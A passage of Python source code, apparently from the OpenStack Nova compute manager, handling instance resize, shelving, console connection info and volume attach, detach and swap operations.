except Exception:
# try to re-schedule the resize elsewhere:
exc_info = sys.exc_info()
self._reschedule_resize_or_reraise(context, image, instance,
exc_info, instance_type, quotas, request_spec,
filter_properties)
finally:
extra_usage_info = dict(
new_instance_type=instance_type['name'],
new_instance_type_id=instance_type['id'])
self._notify_about_instance_usage(
context, instance, "resize.prep.end",
extra_usage_info=extra_usage_info)
def _reschedule_resize_or_reraise(self, context, image, instance, exc_info,
instance_type, quotas, request_spec, filter_properties):
"""Try to re-schedule the resize or re-raise the original error to
error out the instance.
"""
if not request_spec:
request_spec = {}
if not filter_properties:
filter_properties = {}
rescheduled = False
instance_uuid = instance.uuid
try:
reschedule_method = self.compute_task_api.resize_instance
scheduler_hint = dict(filter_properties=filter_properties)
method_args = (instance, None, scheduler_hint, instance_type,
quotas.reservations)
task_state = task_states.RESIZE_PREP
rescheduled = self._reschedule(context, request_spec,
filter_properties, instance, reschedule_method,
method_args, task_state, exc_info)
except Exception as error:
rescheduled = False
LOG.exception(_LE("Error trying to reschedule"),
instance_uuid=instance_uuid)
compute_utils.add_instance_fault_from_exc(context,
instance, error,
exc_info=sys.exc_info())
self._notify_about_instance_usage(context, instance,
'resize.error', fault=error)
if rescheduled:
self._log_original_error(exc_info, instance_uuid)
compute_utils.add_instance_fault_from_exc(context,
instance, exc_info[1], exc_info=exc_info)
self._notify_about_instance_usage(context, instance,
'resize.error', fault=exc_info[1])
else:
# not re-scheduling
raise exc_info[0], exc_info[1], exc_info[2]
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@errors_out_migration
@wrap_instance_fault
def resize_instance(self, context, instance, image,
reservations, migration, instance_type,
clean_shutdown=True):
"""Starts the migration of a running instance to another host."""
quotas = objects.Quotas.from_reservations(context,
reservations,
instance=instance)
with self._error_out_instance_on_exception(context, instance,
quotas=quotas):
# Code downstream may expect extra_specs to be populated since it
# is receiving an object, so lookup the flavor to ensure this.
if (not instance_type or
not isinstance(instance_type, objects.Flavor)):
instance_type = objects.Flavor.get_by_id(
context, migration['new_instance_type_id'])
network_info = self._get_instance_nw_info(context, instance)
migration.status = 'migrating'
with migration.obj_as_admin():
migration.save()
instance.task_state = task_states.RESIZE_MIGRATING
instance.save(expected_task_state=task_states.RESIZE_PREP)
self._notify_about_instance_usage(
context, instance, "resize.start", network_info=network_info)
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
block_device_info = self._get_instance_block_device_info(
context, instance, bdms=bdms)
timeout, retry_interval = self._get_power_off_values(context,
instance, clean_shutdown)
disk_info = self.driver.migrate_disk_and_power_off(
context, instance, migration.dest_host,
instance_type, network_info,
block_device_info,
timeout, retry_interval)
self._terminate_volume_connections(context, instance, bdms)
migration_p = obj_base.obj_to_primitive(migration)
self.network_api.migrate_instance_start(context,
instance,
migration_p)
migration.status = 'post-migrating'
with migration.obj_as_admin():
migration.save()
instance.host = migration.dest_compute
instance.node = migration.dest_node
instance.task_state = task_states.RESIZE_MIGRATED
instance.save(expected_task_state=task_states.RESIZE_MIGRATING)
self.compute_rpcapi.finish_resize(context, instance,
migration, image, disk_info,
migration.dest_compute, reservations=quotas.reservations)
self._notify_about_instance_usage(context, instance, "resize.end",
network_info=network_info)
self.instance_events.clear_events_for_instance(instance)
def _terminate_volume_connections(self, context, instance, bdms):
connector = self.driver.get_volume_connector(instance)
for bdm in bdms:
if bdm.is_volume:
self.volume_api.terminate_connection(context, bdm.volume_id,
connector)
@staticmethod
def _set_instance_info(instance, instance_type):
instance.instance_type_id = instance_type['id']
instance.memory_mb = instance_type['memory_mb']
instance.vcpus = instance_type['vcpus']
instance.root_gb = instance_type['root_gb']
instance.ephemeral_gb = instance_type['ephemeral_gb']
instance.set_flavor(instance_type)
def _finish_resize(self, context, instance, migration, disk_info,
image):
resize_instance = False
old_instance_type_id = migration['old_instance_type_id']
new_instance_type_id = migration['new_instance_type_id']
old_instance_type = instance.get_flavor()
# NOTE(mriedem): Get the old_vm_state so we know if we should
# power on the instance. If old_vm_state is not set we need to default
# to ACTIVE for backwards compatibility
old_vm_state = instance.system_metadata.get('old_vm_state',
vm_states.ACTIVE)
instance.set_flavor(old_instance_type, 'old')
if old_instance_type_id != new_instance_type_id:
instance_type = instance.get_flavor('new')
self._set_instance_info(instance, instance_type)
resize_instance = True
# NOTE(tr3buchet): setup networks on destination host
self.network_api.setup_networks_on_host(context, instance,
migration['dest_compute'])
migration_p = obj_base.obj_to_primitive(migration)
self.network_api.migrate_instance_finish(context,
instance,
migration_p)
network_info = self._get_instance_nw_info(context, instance)
instance.task_state = task_states.RESIZE_FINISH
instance.save(expected_task_state=task_states.RESIZE_MIGRATED)
self._notify_about_instance_usage(
context, instance, "finish_resize.start",
network_info=network_info)
block_device_info = self._get_instance_block_device_info(
context, instance, refresh_conn_info=True)
# NOTE(mriedem): If the original vm_state was STOPPED, we don't
# automatically power on the instance after it's migrated
power_on = old_vm_state != vm_states.STOPPED
try:
self.driver.finish_migration(context, migration, instance,
disk_info,
network_info,
image, resize_instance,
block_device_info, power_on)
except Exception:
with excutils.save_and_reraise_exception():
if resize_instance:
self._set_instance_info(instance,
old_instance_type)
migration.status = 'finished'
with migration.obj_as_admin():
migration.save()
instance.vm_state = vm_states.RESIZED
instance.task_state = None
instance.launched_at = timeutils.utcnow()
instance.save(expected_task_state=task_states.RESIZE_FINISH)
self._update_scheduler_instance_info(context, instance)
self._notify_about_instance_usage(
context, instance, "finish_resize.end",
network_info=network_info)
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@errors_out_migration
@wrap_instance_fault
def finish_resize(self, context, disk_info, image, instance,
reservations, migration):
"""Completes the migration process.
Sets up the newly transferred disk and turns on the instance at its
new host machine.
"""
quotas = objects.Quotas.from_reservations(context,
reservations,
instance=instance)
try:
self._finish_resize(context, instance, migration,
disk_info, image)
quotas.commit()
except Exception:
LOG.exception(_LE('Setting instance vm_state to ERROR'),
instance=instance)
with excutils.save_and_reraise_exception():
try:
quotas.rollback()
except Exception:
LOG.exception(_LE("Failed to rollback quota for failed "
"finish_resize"),
instance=instance)
self._set_instance_error_state(context, instance)
@object_compat
@wrap_exception()
@wrap_instance_fault
def add_fixed_ip_to_instance(self, context, network_id, instance):
"""Calls network_api to add new fixed_ip to instance
then injects the new network info and resets instance networking.
"""
self._notify_about_instance_usage(
context, instance, "create_ip.start")
network_info = self.network_api.add_fixed_ip_to_instance(context,
instance,
network_id)
self._inject_network_info(context, instance, network_info)
self.reset_network(context, instance)
# NOTE(russellb) We just want to bump updated_at. See bug 1143466.
instance.updated_at = timeutils.utcnow()
instance.save()
self._notify_about_instance_usage(
context, instance, "create_ip.end", network_info=network_info)
@object_compat
@wrap_exception()
@wrap_instance_fault
def remove_fixed_ip_from_instance(self, context, address, instance):
"""Calls network_api to remove existing fixed_ip from instance
by injecting the altered network info and resetting
instance networking.
"""
self._notify_about_instance_usage(
context, instance, "delete_ip.start")
network_info = self.network_api.remove_fixed_ip_from_instance(context,
instance,
address)
self._inject_network_info(context, instance, network_info)
self.reset_network(context, instance)
# NOTE(russellb) We just want to bump updated_at. See bug 1143466.
instance.updated_at = timeutils.utcnow()
instance.save()
self._notify_about_instance_usage(
context, instance, "delete_ip.end", network_info=network_info)
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def pause_instance(self, context, instance):
"""Pause an instance on this host."""
context = context.elevated()
LOG.info(_LI('Pausing'), context=context, instance=instance)
self._notify_about_instance_usage(context, instance, 'pause.start')
self.driver.pause(instance)
instance.power_state = self._get_power_state(context, instance)
instance.vm_state = vm_states.PAUSED
instance.task_state = None
instance.save(expected_task_state=task_states.PAUSING)
self._notify_about_instance_usage(context, instance, 'pause.end')
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def unpause_instance(self, context, instance):
"""Unpause a paused instance on this host."""
context = context.elevated()
LOG.info(_LI('Unpausing'), context=context, instance=instance)
self._notify_about_instance_usage(context, instance, 'unpause.start')
self.driver.unpause(instance)
instance.power_state = self._get_power_state(context, instance)
instance.vm_state = vm_states.ACTIVE
instance.task_state = None
instance.save(expected_task_state=task_states.UNPAUSING)
self._notify_about_instance_usage(context, instance, 'unpause.end')
@wrap_exception()
def host_power_action(self, context, action):
"""Reboots, shuts down or powers up the host."""
return self.driver.host_power_action(action)
@wrap_exception()
def host_maintenance_mode(self, context, host, mode):
"""Start/Stop host maintenance window. On start, it triggers
guest VMs evacuation.
"""
return self.driver.host_maintenance_mode(host, mode)
@wrap_exception()
def set_host_enabled(self, context, enabled):
"""Sets the specified host's ability to accept new instances."""
return self.driver.set_host_enabled(enabled)
@wrap_exception()
def get_host_uptime(self, context):
"""Returns the result of calling "uptime" on the target host."""
return self.driver.get_host_uptime()
@object_compat
@wrap_exception()
@wrap_instance_fault
def get_diagnostics(self, context, instance):
"""Retrieve diagnostics for an instance on this host."""
current_power_state = self._get_power_state(context, instance)
if current_power_state == power_state.RUNNING:
LOG.info(_LI("Retrieving diagnostics"), context=context,
instance=instance)
return self.driver.get_diagnostics(instance)
else:
raise exception.InstanceInvalidState(
attr='power_state',
instance_uuid=instance.uuid,
state=instance.power_state,
method='get_diagnostics')
@object_compat
@wrap_exception()
@wrap_instance_fault
def get_instance_diagnostics(self, context, instance):
"""Retrieve diagnostics for an instance on this host."""
current_power_state = self._get_power_state(context, instance)
if current_power_state == power_state.RUNNING:
LOG.info(_LI("Retrieving diagnostics"), context=context,
instance=instance)
diags = self.driver.get_instance_diagnostics(instance)
return diags.serialize()
else:
raise exception.InstanceInvalidState(
attr='power_state',
instance_uuid=instance.uuid,
state=instance.power_state,
method='get_diagnostics')
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def suspend_instance(self, context, instance):
"""Suspend the given instance."""
context = context.elevated()
# Store the old state
instance.system_metadata['old_vm_state'] = instance.vm_state
self._notify_about_instance_usage(context, instance, 'suspend.start')
with self._error_out_instance_on_exception(context, instance,
instance_state=instance.vm_state):
self.driver.suspend(context, instance)
instance.power_state = self._get_power_state(context, instance)
instance.vm_state = vm_states.SUSPENDED
instance.task_state = None
instance.save(expected_task_state=task_states.SUSPENDING)
self._notify_about_instance_usage(context, instance, 'suspend.end')
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def resume_instance(self, context, instance):
"""Resume the given suspended instance."""
context = context.elevated()
LOG.info(_LI('Resuming'), context=context, instance=instance)
self._notify_about_instance_usage(context, instance, 'resume.start')
network_info = self._get_instance_nw_info(context, instance)
block_device_info = self._get_instance_block_device_info(
context, instance)
with self._error_out_instance_on_exception(context, instance,
instance_state=instance.vm_state):
self.driver.resume(context, instance, network_info,
block_device_info)
instance.power_state = self._get_power_state(context, instance)
# We default to the ACTIVE state for backwards compatibility
instance.vm_state = instance.system_metadata.pop('old_vm_state',
vm_states.ACTIVE)
instance.task_state = None
instance.save(expected_task_state=task_states.RESUMING)
self._notify_about_instance_usage(context, instance, 'resume.end')
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def shelve_instance(self, context, instance, image_id,
clean_shutdown=True):
"""Shelve an instance.
This should be used when you want to take a snapshot of the instance.
It also adds system_metadata that can be used by a periodic task to
offload the shelved instance after a period of time.
:param context: request context
:param instance: an Instance object
:param image_id: an image id to snapshot to.
:param clean_shutdown: give the GuestOS a chance to stop
"""
compute_utils.notify_usage_exists(self.notifier, context, instance,
current_period=True)
self._notify_about_instance_usage(context, instance, 'shelve.start')
def update_task_state(task_state, expected_state=task_states.SHELVING):
shelving_state_map = {
task_states.IMAGE_PENDING_UPLOAD:
task_states.SHELVING_IMAGE_PENDING_UPLOAD,
task_states.IMAGE_UPLOADING:
task_states.SHELVING_IMAGE_UPLOADING,
task_states.SHELVING: task_states.SHELVING}
task_state = shelving_state_map[task_state]
expected_state = shelving_state_map[expected_state]
instance.task_state = task_state
instance.save(expected_task_state=expected_state)
self._power_off_instance(context, instance, clean_shutdown)
self.driver.snapshot(context, instance, image_id, update_task_state)
instance.system_metadata['shelved_at'] = timeutils.strtime()
instance.system_metadata['shelved_image_id'] = image_id
instance.system_metadata['shelved_host'] = self.host
instance.vm_state = vm_states.SHELVED
instance.task_state = None
if CONF.shelved_offload_time == 0:
instance.task_state = task_states.SHELVING_OFFLOADING
instance.power_state = self._get_power_state(context, instance)
instance.save(expected_task_state=[
task_states.SHELVING,
task_states.SHELVING_IMAGE_UPLOADING])
self._notify_about_instance_usage(context, instance, 'shelve.end')
if CONF.shelved_offload_time == 0:
self.shelve_offload_instance(context, instance,
clean_shutdown=False)
@wrap_exception()
@reverts_task_state
@wrap_instance_fault
def shelve_offload_instance(self, context, instance, clean_shutdown=True):
"""Remove a shelved instance from the hypervisor.
This frees up those resources for use by other instances, but may lead
to slower unshelve times for this instance. This method is used by
        volume-backed instances since restoring them doesn't involve the
potentially large download of an image.
:param context: request context
:param instance: nova.objects.instance.Instance
:param clean_shutdown: give the GuestOS a chance to stop
"""
self._notify_about_instance_usage(context, instance,
'shelve_offload.start')
self._power_off_instance(context, instance, clean_shutdown)
current_power_state = self._get_power_state(context, instance)
self.network_api.cleanup_instance_network_on_host(context, instance,
instance.host)
network_info = self._get_instance_nw_info(context, instance)
block_device_info = self._get_instance_block_device_info(context,
instance)
self.driver.destroy(context, instance, network_info,
block_device_info)
instance.power_state = current_power_state
instance.host = None
instance.node = None
instance.vm_state = vm_states.SHELVED_OFFLOADED
instance.task_state = None
instance.save(expected_task_state=[task_states.SHELVING,
task_states.SHELVING_OFFLOADING])
self._delete_scheduler_instance_info(context, instance.uuid)
self._notify_about_instance_usage(context, instance,
'shelve_offload.end')
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def unshelve_instance(self, context, instance, image,
filter_properties=None, node=None):
"""Unshelve the instance.
:param context: request context
:param instance: a nova.objects.instance.Instance object
:param image: an image to build from. If None we assume a
volume backed instance.
:param filter_properties: dict containing limits, retry info etc.
:param node: target compute node
"""
if filter_properties is None:
filter_properties = {}
@utils.synchronized(instance.uuid)
def do_unshelve_instance():
self._unshelve_instance(context, instance, image,
filter_properties, node)
do_unshelve_instance()
def _unshelve_instance_key_scrub(self, instance):
"""Remove data from the instance that may cause side effects."""
cleaned_keys = dict(
key_data=instance.key_data,
auto_disk_config=instance.auto_disk_config)
instance.key_data = None
instance.auto_disk_config = False
return cleaned_keys
def _unshelve_instance_key_restore(self, instance, keys):
"""Restore previously scrubbed keys before saving the instance."""
instance.update(keys)
def _unshelve_instance(self, context, instance, image, filter_properties,
node):
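        # Rough flow below (comment added for clarity): claim resources on
        # this host, rebuild block devices and networking, then spawn from
        # either the shelve snapshot image or, for volume-backed instances,
        # the image metadata stashed in system_metadata.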
self._notify_about_instance_usage(context, instance, 'unshelve.start')
instance.task_state = task_states.SPAWNING
instance.save()
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
block_device_info = self._prep_block_device(context, instance, bdms,
do_check_attach=False)
scrubbed_keys = self._unshelve_instance_key_scrub(instance)
if node is None:
node = self.driver.get_available_nodes()[0]
LOG.debug('No node specified, defaulting to %s', node,
instance=instance)
rt = self._get_resource_tracker(node)
limits = filter_properties.get('limits', {})
if image:
shelved_image_ref = instance.image_ref
instance.image_ref = image['id']
image_meta = image
else:
image_meta = utils.get_image_from_system_metadata(
instance.system_metadata)
self.network_api.setup_instance_network_on_host(context, instance,
self.host)
network_info = self._get_instance_nw_info(context, instance)
try:
with rt.instance_claim(context, instance, limits):
self.driver.spawn(context, instance, image_meta,
injected_files=[],
admin_password=None,
network_info=network_info,
block_device_info=block_device_info)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_LE('Instance failed to spawn'),
instance=instance)
if image:
instance.image_ref = shelved_image_ref
self._delete_snapshot_of_shelved_instance(context, instance,
image['id'])
self._unshelve_instance_key_restore(instance, scrubbed_keys)
self._update_instance_after_spawn(context, instance)
# Delete system_metadata for a shelved instance
compute_utils.remove_shelved_keys_from_system_metadata(instance)
instance.save(expected_task_state=task_states.SPAWNING)
self._update_scheduler_instance_info(context, instance)
self._notify_about_instance_usage(context, instance, 'unshelve.end')
@messaging.expected_exceptions(NotImplementedError)
@wrap_instance_fault
def reset_network(self, context, instance):
"""Reset networking on the given instance."""
LOG.debug('Reset network', context=context, instance=instance)
self.driver.reset_network(instance)
def _inject_network_info(self, context, instance, network_info):
"""Inject network info for the given instance."""
LOG.debug('Inject network info', context=context, instance=instance)
LOG.debug('network_info to inject: |%s|', network_info,
instance=instance)
self.driver.inject_network_info(instance,
network_info)
@wrap_instance_fault
def inject_network_info(self, context, instance):
"""Inject network info, but don't return the info."""
network_info = self._get_instance_nw_info(context, instance)
self._inject_network_info(context, instance, network_info)
@object_compat
@messaging.expected_exceptions(NotImplementedError,
exception.InstanceNotFound)
@wrap_exception()
@wrap_instance_fault
def get_console_output(self, context, instance, tail_length):
"""Send the console output for the given instance."""
context = context.elevated()
LOG.info(_LI("Get console output"), context=context,
instance=instance)
output = self.driver.get_console_output(context, instance)
if tail_length is not None:
output = self._tail_log(output, tail_length)
return output.decode('utf-8', 'replace').encode('ascii', 'replace')
def _tail_log(self, log, length):
try:
length = int(length)
except ValueError:
length = 0
if length == 0:
return ''
else:
return '\n'.join(log.split('\n')[-int(length):])
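    # Usage example for the helper above (illustrative comment only):
    #   _tail_log('a\nb\nc', 2)   -> 'b\nc'
    #   _tail_log('a\nb\nc', '0') -> ''   (zero or invalid length -> empty)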
@object_compat
@messaging.expected_exceptions(exception.ConsoleTypeInvalid,
exception.InstanceNotReady,
exception.InstanceNotFound,
exception.ConsoleTypeUnavailable,
NotImplementedError)
@wrap_exception()
@wrap_instance_fault
def get_vnc_console(self, context, console_type, instance):
"""Return connection information for a vnc console."""
context = context.elevated()
LOG.debug("Getting vnc console", instance=instance)
token = str(uuid.uuid4())
if not CONF.vnc_enabled:
raise exception.ConsoleTypeUnavailable(console_type=console_type)
if console_type == 'novnc':
# For essex, novncproxy_base_url must include the full path
# including the html file (like http://myhost/vnc_auto.html)
access_url = '%s?token=%s' % (CONF.novncproxy_base_url, token)
if CONF.virtualbox.vrde_require_instance_uuid_as_password:
password = instance.uuid
if CONF.virtualbox.vrde_password_length:
password = password[:CONF.virtualbox.vrde_password_length]
access_url = ("%(base_url)s&password=%(password)s" %
{"base_url": access_url, "password": password})
elif console_type == 'xvpvnc':
access_url = '%s?token=%s' % (CONF.xvpvncproxy_base_url, token)
else:
raise exception.ConsoleTypeInvalid(console_type=console_type)
try:
# Retrieve connect info from driver, and then decorate with our
# access info token
console = self.driver.get_vnc_console(context, instance)
connect_info = console.get_connection_info(token, access_url)
except exception.InstanceNotFound:
if instance.vm_state != vm_states.BUILDING:
raise
raise exception.InstanceNotReady(instance_id=instance.uuid)
return connect_info
@object_compat
@messaging.expected_exceptions(exception.ConsoleTypeInvalid,
exception.InstanceNotReady,
exception.InstanceNotFound,
exception.ConsoleTypeUnavailable,
NotImplementedError)
@wrap_exception()
@wrap_instance_fault
def get_spice_console(self, context, console_type, instance):
"""Return connection information for a spice console."""
context = context.elevated()
LOG.debug("Getting spice console", instance=instance)
token = str(uuid.uuid4())
if not CONF.spice.enabled:
raise exception.ConsoleTypeUnavailable(console_type=console_type)
if console_type == 'spice-html5':
# For essex, spicehtml5proxy_base_url must include the full path
# including the html file (like http://myhost/spice_auto.html)
access_url = '%s?token=%s' % (CONF.spice.html5proxy_base_url,
token)
else:
raise exception.ConsoleTypeInvalid(console_type=console_type)
try:
# Retrieve connect info from driver, and then decorate with our
# access info token
console = self.driver.get_spice_console(context, instance)
connect_info = console.get_connection_info(token, access_url)
except exception.InstanceNotFound:
if instance.vm_state != vm_states.BUILDING:
raise
raise exception.InstanceNotReady(instance_id=instance.uuid)
return connect_info
@object_compat
@messaging.expected_exceptions(exception.ConsoleTypeInvalid,
exception.InstanceNotReady,
exception.InstanceNotFound,
exception.ConsoleTypeUnavailable,
NotImplementedError)
@wrap_exception()
@wrap_instance_fault
def get_rdp_console(self, context, console_type, instance):
"""Return connection information for a RDP console."""
context = context.elevated()
LOG.debug("Getting RDP console", instance=instance)
token = str(uuid.uuid4())
if not CONF.rdp.enabled:
raise exception.ConsoleTypeUnavailable(console_type=console_type)
if console_type == 'rdp-html5':
access_url = '%s?token=%s' % (CONF.rdp.html5_proxy_base_url,
token)
else:
raise exception.ConsoleTypeInvalid(console_type=console_type)
try:
# Retrieve connect info from driver, and then decorate with our
# access info token
console = self.driver.get_rdp_console(context, instance)
connect_info = console.get_connection_info(token, access_url)
except exception.InstanceNotFound:
if instance.vm_state != vm_states.BUILDING:
raise
raise exception.InstanceNotReady(instance_id=instance.uuid)
return connect_info
@messaging.expected_exceptions(
exception.ConsoleTypeInvalid,
exception.InstanceNotReady,
exception.InstanceNotFound,
exception.ConsoleTypeUnavailable,
exception.SocketPortRangeExhaustedException,
exception.ImageSerialPortNumberInvalid,
exception.ImageSerialPortNumberExceedFlavorValue,
NotImplementedError)
@wrap_exception()
@wrap_instance_fault
def get_serial_console(self, context, console_type, instance):
"""Returns connection information for a serial console."""
LOG.debug("Getting serial console", instance=instance)
if not CONF.serial_console.enabled:
raise exception.ConsoleTypeUnavailable(console_type=console_type)
context = context.elevated()
token = str(uuid.uuid4())
access_url = '%s?token=%s' % (CONF.serial_console.base_url, token)
try:
# Retrieve connect info from driver, and then decorate with our
# access info token
console = self.driver.get_serial_console(context, instance)
connect_info = console.get_connection_info(token, access_url)
except exception.InstanceNotFound:
if instance.vm_state != vm_states.BUILDING:
raise
raise exception.InstanceNotReady(instance_id=instance.uuid)
return connect_info
@messaging.expected_exceptions(exception.ConsoleTypeInvalid,
exception.InstanceNotReady,
exception.InstanceNotFound)
@object_compat
@wrap_exception()
@wrap_instance_fault
def validate_console_port(self, ctxt, instance, port, console_type):
if console_type == "spice-html5":
console_info = self.driver.get_spice_console(ctxt, instance)
elif console_type == "rdp-html5":
console_info = self.driver.get_rdp_console(ctxt, instance)
elif console_type == "serial":
console_info = self.driver.get_serial_console(ctxt, instance)
else:
console_info = self.driver.get_vnc_console(ctxt, instance)
return console_info.port == port
@object_compat
@wrap_exception()
@reverts_task_state
@wrap_instance_fault
def reserve_block_device_name(self, context, instance, device,
volume_id, disk_bus=None, device_type=None,
return_bdm_object=False):
# NOTE(ndipanov): disk_bus and device_type will be set to None if not
# passed (by older clients) and defaulted by the virt driver. Remove
# default values on the next major RPC version bump.
@utils.synchronized(instance.uuid)
def do_reserve():
bdms = (
objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid))
device_name = compute_utils.get_device_name_for_instance(
context, instance, bdms, device)
# NOTE(vish): create bdm here to avoid race condition
bdm = objects.BlockDeviceMapping(
context=context,
source_type='volume', destination_type='volume',
instance_uuid=instance.uuid,
volume_id=volume_id or 'reserved',
device_name=device_name,
disk_bus=disk_bus, device_type=device_type)
bdm.create()
if return_bdm_object:
return bdm
else:
return device_name
return do_reserve()
@object_compat
@wrap_exception()
@reverts_task_state
@wrap_instance_fault
def attach_volume(self, context, volume_id, mountpoint,
instance, bdm=None):
"""Attach a volume to an instance."""
if not bdm:
bdm = objects.BlockDeviceMapping.get_by_volume_id(
context, volume_id)
driver_bdm = driver_block_device.convert_volume(bdm)
@utils.synchronized(instance.uuid)
def do_attach_volume(context, instance, driver_bdm):
try:
return self._attach_volume(context, instance, driver_bdm)
except Exception:
with excutils.save_and_reraise_exception():
bdm.destroy()
do_attach_volume(context, instance, driver_bdm)
def _attach_volume(self, context, instance, bdm):
context = context.elevated()
LOG.info(_LI('Attaching volume %(volume_id)s to %(mountpoint)s'),
{'volume_id': bdm.volume_id,
'mountpoint': bdm['mount_device']},
context=context, instance=instance)
try:
bdm.attach(context, instance, self.volume_api, self.driver,
do_check_attach=False, do_driver_attach=True)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_LE("Failed to attach %(volume_id)s "
"at %(mountpoint)s"),
{'volume_id': bdm.volume_id,
'mountpoint': bdm['mount_device']},
context=context, instance=instance)
self.volume_api.unreserve_volume(context, bdm.volume_id)
info = {'volume_id': bdm.volume_id}
self._notify_about_instance_usage(
context, instance, "volume.attach", extra_usage_info=info)
def _driver_detach_volume(self, context, instance, bdm):
"""Do the actual driver detach using block device mapping."""
mp = bdm.device_name
volume_id = bdm.volume_id
LOG.info(_LI('Detach volume %(volume_id)s from mountpoint %(mp)s'),
{'volume_id': volume_id, 'mp': mp},
context=context, instance=instance)
connection_info = jsonutils.loads(bdm.connection_info)
        # NOTE(vish): We currently don't use the serial when disconnecting,
        #             but it is added for completeness in case we ever do.
if connection_info and 'serial' not in connection_info:
connection_info['serial'] = volume_id
try:
if not self.driver.instance_exists(instance):
LOG.warning(_LW('Detaching volume from unknown instance'),
context=context, instance=instance)
encryption = encryptors.get_encryption_metadata(
context, self.volume_api, volume_id, connection_info)
self.driver.detach_volume(connection_info,
instance,
mp,
encryption=encryption)
except exception.DiskNotFound as err:
LOG.warning(_LW('Ignoring DiskNotFound exception while detaching '
'volume %(volume_id)s from %(mp)s: %(err)s'),
{'volume_id': volume_id, 'mp': mp, 'err': err},
instance=instance)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_LE('Failed to detach volume %(volume_id)s '
'from %(mp)s'),
{'volume_id': volume_id, 'mp': mp},
context=context, instance=instance)
self.volume_api.roll_detaching(context, volume_id)
def _detach_volume(self, context, volume_id, instance, destroy_bdm=True):
"""Detach a volume from an instance.
:param context: security context
:param volume_id: the volume id
:param instance: the Instance object to detach the volume from
:param destroy_bdm: if True, the corresponding BDM entry will be marked
as deleted. Disabling this is useful for operations
like rebuild, when we don't want to destroy BDM
"""
bdm = objects.BlockDeviceMapping.get_by_volume_id(
context, volume_id)
if CONF.volume_usage_poll_interval > 0:
vol_stats = []
mp = bdm.device_name
# Handle bootable volumes which will not contain /dev/
if '/dev/' in mp:
mp = mp[5:]
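                # e.g. '/dev/vdb' -> 'vdb'; the driver's block_stats() is
                # assumed to take the bare device name (illustrative note).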
try:
vol_stats = self.driver.block_stats(instance, mp)
except NotImplementedError:
pass
if vol_stats:
LOG.debug("Updating volume usage cache with totals",
instance=instance)
rd_req, rd_bytes, wr_req, wr_bytes, flush_ops = vol_stats
self.conductor_api.vol_usage_update(context, volume_id,
rd_req, rd_bytes,
wr_req, wr_bytes,
instance,
update_totals=True)
self._driver_detach_volume(context, instance, bdm)
connector = self.driver.get_volume_connector(instance)
self.volume_api.terminate_connection(context, volume_id, connector)
if destroy_bdm:
bdm.destroy()
info = dict(volume_id=volume_id)
self._notify_about_instance_usage(
context, instance, "volume.detach", extra_usage_info=info)
self.volume_api.detach(context.elevated(), volume_id)
@object_compat
@wrap_exception()
@reverts_task_state
@wrap_instance_fault
def detach_volume(self, context, volume_id, instance):
"""Detach a volume from an instance."""
self._detach_volume(context, volume_id, instance)
def _init_volume_connection(self, context, new_volume_id,
old_volume_id, connector, instance, bdm):
new_cinfo = self.volume_api.initialize_connection(context,
new_volume_id,
connector)
old_cinfo = jsonutils.loads(bdm['connection_info'])
if old_cinfo and 'serial' not in old_cinfo:
old_cinfo['serial'] = old_volume_id
new_cinfo['serial'] = old_cinfo['serial']
return (old_cinfo, new_cinfo)
def _swap_volume(self, context, instance, bdm, connector, old_volume_id,
new_volume_id):
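        # Sketch of the flow below (clarifying comment): initialize the new
        # volume's connection, have the driver copy/swap the data (growing
        # the virtual disk if the new volume is larger), then tell Cinder to
        # complete the migration; on failure the unused connection is torn
        # down and the detaching/reserved volume states are rolled back.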
mountpoint = bdm['device_name']
failed = False
new_cinfo = None
resize_to = 0
try:
old_cinfo, new_cinfo = self._init_volume_connection(context,
new_volume_id,
old_volume_id,
connector,
instance,
bdm)
old_vol_size = self.volume_api.get(context, old_volume_id)['size']
new_vol_size = self.volume_api.get(context, new_volume_id)['size']
if new_vol_size > old_vol_size:
resize_to = new_vol_size
self.driver.swap_volume(old_cinfo, new_cinfo, instance, mountpoint,
resize_to)
except Exception:
failed = True
with excutils.save_and_reraise_exception():
if new_cinfo:
msg = _LE("Failed to swap volume %(old_volume_id)s "
"for %(new_volume_id)s")
LOG.exception(msg, {'old_volume_id': old_volume_id,
'new_volume_id': new_volume_id},
context=context,
instance=instance)
else:
msg = _LE("Failed to connect to volume %(volume_id)s "
"with volume at %(mountpoint)s")
LOG.exception(msg, {'volume_id': new_volume_id,
'mountpoint': bdm['device_name']},
context=context,
instance=instance)
self.volume_api.roll_detaching(context, old_volume_id)
self.volume_api.unreserve_volume(context, new_volume_id)
finally:
conn_volume = new_volume_id if failed else old_volume_id
if new_cinfo:
self.volume_api.terminate_connection(context,
conn_volume,
connector)
# If Cinder initiated the swap, it will keep
# the original ID
comp_ret = self.volume_api.migrate_volume_completion(
context,
old_volume_id,
new_volume_id,
error=failed)
return (comp_ret, new_cinfo)
@wrap_exception()
@reverts_task_state
@wrap_instance_fault
def swap_volume(self, context, old_volume_id, new_volume_id, instance):
"""Swap volume for an instance."""
context = context.elevated()
bdm = objects.BlockDeviceMapping.get_by_volume_id(
context, old_volume_id, instance_uuid=instance.uuid)
connector = self.driver.get_volume_connector(instance)
comp_ret, new_cinfo = self._swap_volume(context, instance,
bdm,
connector,
old_volume_id,
new_volume_id)
save_volume_id = comp_ret['save_volume_id']
# Update bdm
values = {
'connection_info': jsonutils.dumps(new_cinfo),
'delete_on_termination': False,
'source_type': 'volume',
'destination_type': 'volume',
'snapshot_id': None,
'volume_id': save_volume_id,
'volume_size': None,
'no_device': None}
bdm.update(values)
bdm.save()
@wrap_exception()
def remove_volume_connection(self, context, volume_id, instance):
"""Remove a volume connection using the volume api."""
# NOTE(vish): We don't want to actually mark the volume
# detached, or delete the bdm, just remove the
# connection from this host.
